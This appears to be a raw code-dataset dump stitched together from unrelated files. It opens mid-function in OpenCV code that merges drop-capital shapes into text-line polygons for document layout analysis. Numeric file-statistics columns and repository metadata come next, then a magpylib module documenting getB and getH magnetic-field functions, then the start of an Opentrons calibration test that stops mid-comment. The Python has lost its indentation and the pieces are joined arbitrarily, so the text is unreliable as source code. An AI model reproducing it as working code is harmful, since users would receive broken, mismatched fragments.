# print(np.shape(contours_biggest))
# print(contours_biggest[:])
# contours_biggest[:,0,0]=contours_biggest[:,0,0]#-all_box_coord[int(region_final)][2]
# contours_biggest[:,0,1]=contours_biggest[:,0,1]#-all_box_coord[int(region_final)][0]
# contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
except:
# print('gordun1')
pass
elif len(region_with_intersected_drop) == 1:
region_final = region_with_intersected_drop[0] - 1
# areas_main=np.array([cv2.contourArea(all_found_texline_polygons[int(region_final)][0][j] ) for j in range(len(all_found_texline_polygons[int(region_final)]))])
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = np.array(cy_t) # all_box_coord[int(region_final)][0]+np.array(cy_t)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 0] # +all_box_coord[int(region_final)][2]
cnt_nearest[:, 0, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 1] # +all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
# plt.imshow(img_textlines)
# plt.show()
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
# contours_biggest[:,0,0]=contours_biggest[:,0,0]#-all_box_coord[int(region_final)][2]
# contours_biggest[:,0,1]=contours_biggest[:,0,1]#-all_box_coord[int(region_final)][0]
# print(np.shape(contours_biggest),'contours_biggest')
# print(np.shape(all_found_texline_polygons[int(region_final)][arg_min]))
##contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
# print(cx_t,'print')
try:
# print(all_found_texline_polygons[j_cont][0])
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = all_box_coord[int(region_final)][0] + np.array(cy_t)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 0] # +all_box_coord[int(region_final)][2]
cnt_nearest[:, 0, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 1] # +all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
contours_biggest[:, 0, 0] = contours_biggest[:, 0, 0] # -all_box_coord[int(region_final)][2]
contours_biggest[:, 0, 1] = contours_biggest[:, 0, 1] # -all_box_coord[int(region_final)][0]
##contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
# all_found_texline_polygons[int(region_final)][arg_min]=contours_biggest
except:
pass
else:
pass
##cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
###print(all_box_coord[j_cont])
###print(cx_t)
###print(cy_t)
###print(cx_d[i_drop])
###print(cy_d[i_drop])
##y_lines=all_box_coord[int(region_final)][0]+np.array(cy_t)
##y_lines[y_lines<y_min_d[i_drop]]=0
###print(y_lines)
##arg_min=np.argmin(np.abs(y_lines-y_min_d[i_drop]) )
###print(arg_min)
##cnt_nearest=np.copy(all_found_texline_polygons[int(region_final)][arg_min])
##cnt_nearest[:,0,0]=all_found_texline_polygons[int(region_final)][arg_min][:,0,0]#+all_box_coord[int(region_final)][2]
##cnt_nearest[:,0,1]=all_found_texline_polygons[int(region_final)][arg_min][:,0,1]#+all_box_coord[int(region_final)][0]
##img_textlines=np.zeros((text_regions_p.shape[0],text_regions_p.shape[1],3))
##img_textlines=cv2.fillPoly(img_textlines,pts=[cnt_nearest],color=(255,255,255))
##img_textlines=cv2.fillPoly(img_textlines,pts=[polygons_of_drop_capitals[i_drop] ],color=(255,255,255))
##img_textlines=img_textlines.astype(np.uint8)
##plt.imshow(img_textlines)
##plt.show()
##imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
##ret, thresh = cv2.threshold(imgray, 0, 255, 0)
##contours_combined,hierarchy=cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
##print(len(contours_combined),'len textlines mixed')
##areas_cnt_text=np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
##contours_biggest=contours_combined[np.argmax(areas_cnt_text)]
###print(np.shape(contours_biggest))
###print(contours_biggest[:])
##contours_biggest[:,0,0]=contours_biggest[:,0,0]#-all_box_coord[int(region_final)][2]
##contours_biggest[:,0,1]=contours_biggest[:,0,1]#-all_box_coord[int(region_final)][0]
##contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
##all_found_texline_polygons[int(region_final)][arg_min]=contours_biggest
else:
if len(region_with_intersected_drop) > 1:
sum_pixels_of_intersection = []
for i in range(len(region_with_intersected_drop)):
# print((region_with_intersected_drop[i]*3+1))
sum_pixels_of_intersection.append(((img_con_all_copy[:, :, 0] == (region_with_intersected_drop[i] * 3 + 1)) * 1).sum())
# print(sum_pixels_of_intersection)
region_final = region_with_intersected_drop[np.argmax(sum_pixels_of_intersection)] - 1
# print(region_final,'region_final')
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
try:
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = all_box_coord[int(region_final)][0] + np.array(cy_t)
# print(y_lines)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0] + all_box_coord[int(region_final)][2]
cnt_nearest[:, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 1] + all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
contours_biggest[:, 0, 0] = contours_biggest[:, 0, 0] - all_box_coord[int(region_final)][2]
contours_biggest[:, 0, 1] = contours_biggest[:, 0, 1] - all_box_coord[int(region_final)][0]
contours_biggest = contours_biggest.reshape(np.shape(contours_biggest)[0], np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
except:
# print('gordun1')
pass
elif len(region_with_intersected_drop) == 1:
region_final = region_with_intersected_drop[0] - 1
# areas_main=np.array([cv2.contourArea(all_found_texline_polygons[int(region_final)][0][j] ) for j in range(len(all_found_texline_polygons[int(region_final)]))])
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(cx_t,'print')
try:
# print(all_found_texline_polygons[j_cont][0])
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = all_box_coord[int(region_final)][0] + np.array(cy_t)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0] + all_box_coord[int(region_final)][2]
cnt_nearest[:, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 1] + all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
contours_biggest[:, 0, 0] = contours_biggest[:, 0, 0] - all_box_coord[int(region_final)][2]
contours_biggest[:, 0, 1] = contours_biggest[:, 0, 1] - all_box_coord[int(region_final)][0]
contours_biggest = contours_biggest.reshape(np.shape(contours_biggest)[0], np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
# all_found_texline_polygons[int(region_final)][arg_min]=contours_biggest
except:
pass
else:
pass
#####for i_drop in range(len(polygons_of_drop_capitals)):
#####for j_cont in range(len(contours_only_text_parent)):
#####img_con=np.zeros((text_regions_p.shape[0],text_regions_p.shape[1],3))
#####img_con=cv2.fillPoly(img_con,pts=[polygons_of_drop_capitals[i_drop] ],color=(255,255,255))
#####img_con=cv2.fillPoly(img_con,pts=[contours_only_text_parent[j_cont]],color=(255,255,255))
#####img_con=img_con.astype(np.uint8)
######imgray = cv2.cvtColor(img_con, cv2.COLOR_BGR2GRAY)
######ret, thresh = cv2.threshold(imgray, 0, 255, 0)
######contours_new,hierarchy=cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
#####contours_new,hir_new=return_contours_of_image(img_con)
#####contours_new_parent=return_parent_contours( contours_new,hir_new)
######plt.imshow(img_con)
######plt.show()
#####try:
#####if len(contours_new_parent)==1:
######print(all_found_texline_polygons[j_cont][0])
#####cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[j_cont])
######print(all_box_coord[j_cont])
######print(cx_t)
######print(cy_t)
######print(cx_d[i_drop])
######print(cy_d[i_drop])
#####y_lines=all_box_coord[j_cont][0]+np.array(cy_t)
######print(y_lines)
#####arg_min=np.argmin(np.abs(y_lines-y_min_d[i_drop]) )
######print(arg_min)
#####cnt_nearest=np.copy(all_found_texline_polygons[j_cont][arg_min])
#####cnt_nearest[:,0]=all_found_texline_polygons[j_cont][arg_min][:,0]+all_box_coord[j_cont][2]
#####cnt_nearest[:,1]=all_found_texline_polygons[j_cont][arg_min][:,1]+all_box_coord[j_cont][0]
#####img_textlines=np.zeros((text_regions_p.shape[0],text_regions_p.shape[1],3))
#####img_textlines=cv2.fillPoly(img_textlines,pts=[cnt_nearest],color=(255,255,255))
#####img_textlines=cv2.fillPoly(img_textlines,pts=[polygons_of_drop_capitals[i_drop] ],color=(255,255,255))
#####img_textlines=img_textlines.astype(np.uint8)
#####imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
#####ret, thresh = cv2.threshold(imgray, 0, 255, 0)
#####contours_combined,hierarchy=cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
#####areas_cnt_text=np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
#####contours_biggest=contours_combined[np.argmax(areas_cnt_text)]
######print(np.shape(contours_biggest))
######print(contours_biggest[:])
#####contours_biggest[:,0,0]=contours_biggest[:,0,0]-all_box_coord[j_cont][2]
#####contours_biggest[:,0,1]=contours_biggest[:,0,1]-all_box_coord[j_cont][0]
#####all_found_texline_polygons[j_cont][arg_min]=contours_biggest
######print(contours_biggest)
######plt.imshow(img_textlines[:,:,0])
######plt.show()
#####else:
#####pass
#####except:
#####pass
return all_found_texline_polygons
def filter_small_drop_capitals_from_no_patch_layout(layout_no_patch, layout1):
drop_only = (layout_no_patch[:, :, 0] == 4) * 1
contours_drop, hir_on_drop = return_contours_of_image(drop_only)
contours_drop_parent = return_parent_contours(contours_drop, hir_on_drop)
areas_cnt_text = np.array([cv2.contourArea(contours_drop_parent[j]) for j in range(len(contours_drop_parent))])
areas_cnt_text = areas_cnt_text / float(drop_only.shape[0] * drop_only.shape[1])
contours_drop_parent = [contours_drop_parent[jz] for jz in range(len(contours_drop_parent)) if areas_cnt_text[jz] > 0.001]
areas_cnt_text = [areas_cnt_text[jz] for jz in range(len(areas_cnt_text)) if areas_cnt_text[jz] > 0.001]
contours_drop_parent_final = []
for jj in range(len(contours_drop_parent)):
x, y, w, h = cv2.boundingRect(contours_drop_parent[jj])
# boxes.append([int(x), int(y), int(w), int(h)])
iou_of_box_and_contoure = float(drop_only.shape[0] * drop_only.shape[1]) * areas_cnt_text[jj] / float(w * h) * 100
height_to_weight_ratio = h / float(w)
weigh_to_height_ratio = w / float(h)
if iou_of_box_and_contoure > 60 and weigh_to_height_ratio < 1.2 and height_to_weight_ratio < 2:
map_of_drop_contour_bb = np.zeros((layout1.shape[0], layout1.shape[1]))
map_of_drop_contour_bb[y : y + h, x : x + w] = layout1[y : y + h, x : x + w]
if (((map_of_drop_contour_bb == 1) * 1).sum() / float(((map_of_drop_contour_bb == 5) * 1).sum()) * 100) >= 15:
contours_drop_parent_final.append(contours_drop_parent[jj])
layout_no_patch[:, :, 0][layout_no_patch[:, :, 0] == 4] = 0
layout_no_patch = cv2.fillPoly(layout_no_patch, pts=contours_drop_parent_final, color=(4, 4, 4))
return layout_no_patch
| 52.605578
| 177
| 0.62057
| 3,555
| 26,408
| 4.200563
| 0.044726
| 0.085381
| 0.066564
| 0.084712
| 0.912074
| 0.883011
| 0.864997
| 0.842697
| 0.822541
| 0.802451
| 0
| 0.030102
| 0.245229
| 26,408
| 501
| 178
| 52.710579
| 0.719095
| 0.331415
| 0
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010417
| false
| 0.03125
| 0.015625
| 0
| 0.036458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4725e024171d412c830465b7e9e9c89d2a8d0788
| 12,938
|
py
|
Python
|
magpylib/_src/fields/field_wrap_BH_level3.py
|
OrtnerMichael/magPyLib
|
4c7e7f56f6e0b915ec0e024c172c460fa80126e5
|
[
"BSD-2-Clause"
] | null | null | null |
magpylib/_src/fields/field_wrap_BH_level3.py
|
OrtnerMichael/magPyLib
|
4c7e7f56f6e0b915ec0e024c172c460fa80126e5
|
[
"BSD-2-Clause"
] | null | null | null |
magpylib/_src/fields/field_wrap_BH_level3.py
|
OrtnerMichael/magPyLib
|
4c7e7f56f6e0b915ec0e024c172c460fa80126e5
|
[
"BSD-2-Clause"
] | null | null | null |
from magpylib._src.fields.field_wrap_BH_level2 import getBH_level2
def getB(
sources=None, observers=None, sumup=False, squeeze=True, pixel_agg=None, **kwargs
):
"""Compute B-field in [mT] for given sources and observers.
Field implementations can be directly accessed (avoiding the object oriented
Magpylib interface) by providing a string input `sources=source_type`, array_like
positions as `observers` input, and all other necessary input parameters (see below)
as kwargs.
Parameters
----------
sources: source and collection objects or 1D list thereof
Sources that generate the magnetic field. Can be a single source (or collection)
or a 1D list of l source and/or collection objects.
Direct interface: input must be one of (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`,
`'Sphere'`, `'Dipole'`, `'Loop'` or `'Line'`).
observers: array_like or (list of) `Sensor` objects
Can be array_like positions of shape (n1, n2, ..., 3) where the field
should be evaluated, a `Sensor` object with pixel shape (n1, n2, ..., 3) or a list
of such sensor objects (must all have similar pixel shapes). All positions
are given in units of [mm].
Direct interface: Input must be array_like with shape (3,) or (n,3) corresponding
positions to observer positions in units of [mm].
sumup: bool, default=`False`
If `True`, the fields of all sources are summed up.
squeeze: bool, default=`True`
If `True`, the output is squeezed, i.e. all axes of length 1 in the output (e.g. only
a single sensor or only a single source) are eliminated.
pixel_agg: str, default=`None`
Reference to a compatible numpy aggregator function like `'min'` or `'mean'`,
which is applied to observer output values, e.g. mean of all sensor pixel outputs.
With this option, observers input with different (pixel) shapes is allowed.
Other Parameters (Direct interface)
-----------------------------------
position: array_like, shape (3,) or (n,3), default=`(0,0,0)`
Source position(s) in the global coordinates in units of [mm].
orientation: scipy `Rotation` object with length 1 or n, default=`None`
Object orientation(s) in the global coordinates. `None` corresponds to
a unit-rotation.
magnetization: array_like, shape (3,) or (n,3)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`, `'Sphere'`)!
Magnetization vector(s) (mu0*M, remanence field) in units of [kA/m] given in
the local object coordinates (rotates with object).
moment: array_like, shape (3) or (n,3), unit [mT*mm^3]
Only source_type == `'Dipole'`!
Magnetic dipole moment(s) in units of [mT*mm^3] given in the local object coordinates
(rotates with object). For homogeneous magnets the relation moment=magnetization*volume
holds.
current: array_like, shape (n,)
Only source_type == `'Loop'` or `'Line'`!
Electrical current in units of [A].
dimension: array_like, shape (x,) or (n,x)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`)!
Magnet dimension input in units of [mm] and [deg]. Dimension format x of sources is similar
as in object oriented interface.
diameter: array_like, shape (n,)
Only source_type == `'Sphere'` or `'Loop'`!
Diameter of source in units of [mm].
segment_start: array_like, shape (n,3)
Only source_type == `'Line'`!
Start positions of line current segments in units of [mm].
segment_end: array_like, shape (n,3)
Only source_type == `'Line'`!
End positions of line current segments in units of [mm].
Returns
-------
B-field: ndarray, shape squeeze(m, k, n1, n2, ..., 3)
B-field at each path position (m) for each sensor (k) and each sensor pixel
position (n1, n2, ...) in units of [mT]. Sensor pixel positions are equivalent
to simple observer positions. Paths of objects that are shorter than m will be
considered as static beyond their end.
Direct interface: ndarray, shape (n,3)
B-field for every parameter set in units of [mT].
Notes
-----
This function automatically joins all sensor and position inputs together and groups
similar sources for optimal vectorization of the computation. For maximal performance
call this function as little as possible and avoid using it in loops.
Examples
--------
In this example we compute the B-field [mT] of a spherical magnet and a current loop
at the observer position (1,1,1) given in units of [mm]:
>>> import magpylib as magpy
>>> src1 = magpy.current.Loop(current=100, diameter=2)
>>> src2 = magpy.magnet.Sphere(magnetization=(0,0,100), diameter=1)
>>> B = magpy.getB([src1, src2], (1,1,1))
>>> print(B)
[[6.23597388e+00 6.23597388e+00 2.66977810e+00]
[8.01875374e-01 8.01875374e-01 1.48029737e-16]]
We can also use sensor objects as observers input:
>>> sens1 = magpy.Sensor(position=(1,1,1))
>>> sens2 = sens1.copy(position=(1,1,-1))
>>> B = magpy.getB([src1, src2], [sens1, sens2])
>>> print(B)
[[[ 6.23597388e+00 6.23597388e+00 2.66977810e+00]
[-6.23597388e+00 -6.23597388e+00 2.66977810e+00]]
<BLANKLINE>
[[ 8.01875374e-01 8.01875374e-01 1.48029737e-16]
[-8.01875374e-01 -8.01875374e-01 1.48029737e-16]]]
Through the direct interface we can compute the same fields for the loop as:
>>> obs = [(1,1,1), (1,1,-1)]
>>> B = magpy.getB('Loop', obs, current=100, diameter=2)
>>> print(B)
[[ 6.23597388 6.23597388 2.6697781 ]
[-6.23597388 -6.23597388 2.6697781 ]]
But also for a set of four completely different instances:
>>> B = magpy.getB(
... 'Loop',
... observers=((1,1,1), (1,1,-1), (1,2,3), (2,2,2)),
... current=(11, 22, 33, 44),
... diameter=(1, 2, 3, 4),
... position=((0,0,0), (0,0,1), (0,0,2), (0,0,3)),
... )
>>> print(B)
[[ 0.17111325 0.17111325 0.01705189]
[-0.38852048 -0.38852048 0.49400758]
[ 1.14713551 2.29427102 -0.22065346]
[-2.48213467 -2.48213467 -0.79683487]]
"""
return getBH_level2(
sources,
observers,
sumup=sumup,
squeeze=squeeze,
pixel_agg=pixel_agg,
field="B",
**kwargs
)
def getH(
sources=None, observers=None, sumup=False, squeeze=True, pixel_agg=None, **kwargs
):
"""Compute H-field in [kA/m] for given sources and observers.
Field implementations can be directly accessed (avoiding the object oriented
Magpylib interface) by providing a string input `sources=source_type`, array_like
positions as `observers` input, and all other necessary input parameters (see below)
as kwargs.
Parameters
----------
sources: source and collection objects or 1D list thereof
Sources that generate the magnetic field. Can be a single source (or collection)
or a 1D list of l source and/or collection objects.
Direct interface: input must be one of (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`,
`'Sphere'`, `'Dipole'`, `'Loop'` or `'Line'`).
observers: array_like or (list of) `Sensor` objects
Can be array_like positions of shape (n1, n2, ..., 3) where the field
should be evaluated, a `Sensor` object with pixel shape (n1, n2, ..., 3) or a list
of such sensor objects (must all have similar pixel shapes). All positions
are given in units of [mm].
Direct interface: Input must be array_like with shape (3,) or (n,3) corresponding
positions to observer positions in units of [mm].
sumup: bool, default=`False`
If `True`, the fields of all sources are summed up.
squeeze: bool, default=`True`
If `True`, the output is squeezed, i.e. all axes of length 1 in the output (e.g. only
a single sensor or only a single source) are eliminated.
pixel_agg: str, default=`None`
Reference to a compatible numpy aggregator function like `'min'` or `'mean'`,
which is applied to observer output values, e.g. mean of all sensor pixel outputs.
With this option, observer inputs with different (pixel) shapes are allowed.
Other Parameters (Direct interface)
-----------------------------------
position: array_like, shape (3,) or (n,3), default=`(0,0,0)`
Source position(s) in the global coordinates in units of [mm].
orientation: scipy `Rotation` object with length 1 or n, default=`None`
Object orientation(s) in the global coordinates. `None` corresponds to
a unit-rotation.
magnetization: array_like, shape (3,) or (n,3)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`, `'Sphere'`)!
Magnetization vector(s) (mu0*M, remanence field) in units of [kA/m] given in
the local object coordinates (rotates with object).
moment: array_like, shape (3) or (n,3), unit [mT*mm^3]
Only source_type == `'Dipole'`!
Magnetic dipole moment(s) in units of [mT*mm^3] given in the local object coordinates
(rotates with object). For homogeneous magnets the relation moment=magnetization*volume
holds.
current: array_like, shape (n,)
Only source_type == `'Loop'` or `'Line'`!
Electrical current in units of [A].
dimension: array_like, shape (x,) or (n,x)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`)!
Magnet dimension input in units of [mm] and [deg]. Dimension format x of sources is similar
as in object oriented interface.
diameter: array_like, shape (n,)
Only source_type == `'Sphere'` or `'Loop'`!
Diameter of source in units of [mm].
segment_start: array_like, shape (n,3)
Only source_type == `'Line'`!
Start positions of line current segments in units of [mm].
segment_end: array_like, shape (n,3)
Only source_type == `'Line'`!
End positions of line current segments in units of [mm].
Returns
-------
H-field: ndarray, shape squeeze(m, k, n1, n2, ..., 3)
H-field at each path position (m) for each sensor (k) and each sensor pixel
position (n1, n2, ...) in units of [kA/m]. Sensor pixel positions are equivalent
to simple observer positions. Paths of objects that are shorter than m will be
considered as static beyond their end.
Direct interface: ndarray, shape (n,3)
H-field for every parameter set in units of [kA/m].
Notes
-----
This function automatically joins all sensor and position inputs together and groups
similar sources for optimal vectorization of the computation. For maximal performance
call this function as little as possible and avoid using it in loops.
Examples
--------
In this example we compute the H-field [kA/m] of a spherical magnet and a current loop
at the observer position (1,1,1) given in units of [mm]:
>>> import magpylib as magpy
>>> src1 = magpy.current.Loop(current=100, diameter=2)
>>> src2 = magpy.magnet.Sphere(magnetization=(0,0,100), diameter=1)
>>> H = magpy.getH([src1, src2], (1,1,1))
>>> print(H)
[[4.96243034e+00 4.96243034e+00 2.12454191e+00]
[6.38112147e-01 6.38112147e-01 1.17798322e-16]]
We can also use sensor objects as observers input:
>>> sens1 = magpy.Sensor(position=(1,1,1))
>>> sens2 = sens1.copy(position=(1,1,-1))
>>> H = magpy.getH([src1, src2], [sens1, sens2])
>>> print(H)
[[[ 4.96243034e+00 4.96243034e+00 2.12454191e+00]
[-4.96243034e+00 -4.96243034e+00 2.12454191e+00]]
<BLANKLINE>
[[ 6.38112147e-01 6.38112147e-01 1.17798322e-16]
[-6.38112147e-01 -6.38112147e-01 1.17798322e-16]]]
Through the direct interface we can compute the same fields for the loop as:
>>> obs = [(1,1,1), (1,1,-1)]
>>> H = magpy.getH('Loop', obs, current=100, diameter=2)
>>> print(H)
[[ 4.96243034 4.96243034 2.12454191]
[-4.96243034 -4.96243034 2.12454191]]
But also for a set of four completely different instances:
>>> H = magpy.getH(
... 'Loop',
... observers=((1,1,1), (1,1,-1), (1,2,3), (2,2,2)),
... current=(11, 22, 33, 44),
... diameter=(1, 2, 3, 4),
... position=((0,0,0), (0,0,1), (0,0,2), (0,0,3)),
... )
>>> print(H)
[[ 0.1361676 0.1361676 0.01356947]
[-0.30917477 -0.30917477 0.39311875]
[ 0.91286143 1.82572286 -0.17559045]
[-1.97522001 -1.97522001 -0.63410104]]
"""
return getBH_level2(
sources,
observers,
sumup=sumup,
squeeze=squeeze,
pixel_agg=pixel_agg,
field="H",
**kwargs
)
| 40.943038
| 99
| 0.630778
| 1,845
| 12,938
| 4.391328
| 0.145799
| 0.00938
| 0.028882
| 0.021723
| 0.942236
| 0.939027
| 0.913848
| 0.906196
| 0.897803
| 0.855591
| 0
| 0.095712
| 0.239295
| 12,938
| 315
| 100
| 41.073016
| 0.727494
| 0.879425
| 0
| 0.72
| 0
| 0
| 0.00315
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5b34ea69be0d894dea4ab9ac8d6ed5111c5140bc
| 13,550
|
py
|
Python
|
api/tests/opentrons/server/calibration_integration_test.py
|
wheresaddie/opentrons
|
b90a87e2b45ea3db7677d130d683249460e4b91a
|
[
"Apache-2.0"
] | null | null | null |
api/tests/opentrons/server/calibration_integration_test.py
|
wheresaddie/opentrons
|
b90a87e2b45ea3db7677d130d683249460e4b91a
|
[
"Apache-2.0"
] | null | null | null |
api/tests/opentrons/server/calibration_integration_test.py
|
wheresaddie/opentrons
|
b90a87e2b45ea3db7677d130d683249460e4b91a
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pytest
from opentrons import types
from opentrons import deck_calibration as dc
from opentrons.deck_calibration import endpoints
from opentrons.trackers.pose_tracker import absolute
from opentrons.config.pipette_config import Y_OFFSET_MULTI
from opentrons.hardware_control.types import CriticalPoint
# Note that several values in this file have target/expected values that do not
# accurately reflect robot operation, because of differences between return
# values from the driver during simulating vs. non-simulating modes. In
